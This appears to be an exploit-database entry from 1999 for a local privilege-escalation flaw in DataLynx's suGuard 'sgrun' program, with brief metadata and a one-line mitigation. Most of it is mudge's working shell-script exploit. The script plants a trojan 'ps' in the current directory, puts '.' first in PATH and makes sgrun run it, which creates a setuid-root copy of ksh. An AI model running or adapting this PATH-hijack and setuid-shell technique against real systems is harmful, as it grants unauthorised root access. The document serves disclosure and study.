DataLynx suGuard Program Vulnerability

vendor:

suGuard Program

by:

mudge

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: suGuard Program

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

1999

DataLynx suGuard Program Vulnerability

A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming.

Mitigation:

Ensure that the /tmp directory is not used for storing sensitive information and that proper programming techniques are used.

Source

Exploit-DB raw data:

#source: https://www.securityfocus.com/bid/186/info
#
#A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. 

#!/bin/sh
# sgrun exploit - the types of vulnerabilities that this exploit exercises
#  have no right being introduced to code in this day and age. Much less
#  code which presents itself under the pretenses of securing your system.
#   .mudge 01.02.99
#
SUSHI=./sushi

if [ $# -ne 2 ] ; then
  echo Must specify path to sgrun [/bin/datalynx/sgrun] and sgrun argument
  echo  mudge@l0pht.com [01.02.99]
  exit 1
fi
  
SGRUN=$1
ARG=$2

if [ -f ${SUSHI} ] ; then
  echo root shell already created?
  exit
fi

echo datalynx sgrun proof of concept exploit from L0pht [mudge@l0pht.com]
echo

cat > ./ps << FOEFOE
#!/bin/sh
cp /bin/ksh ${SUSHI}
chown root ${SUSHI}
chmod 4555 ${SUSHI}
FOEFOE

chmod 755 ./ps

PATH=.:${PATH}
export PATH

#/bin/datalynx/sgrun Identify 
${SGRUN} ${ARG}
if [ -f ${SUSHI} ] ; then
  echo root shell created as ${SUSHI}
  ls -l ${SUSHI}
  echo
fi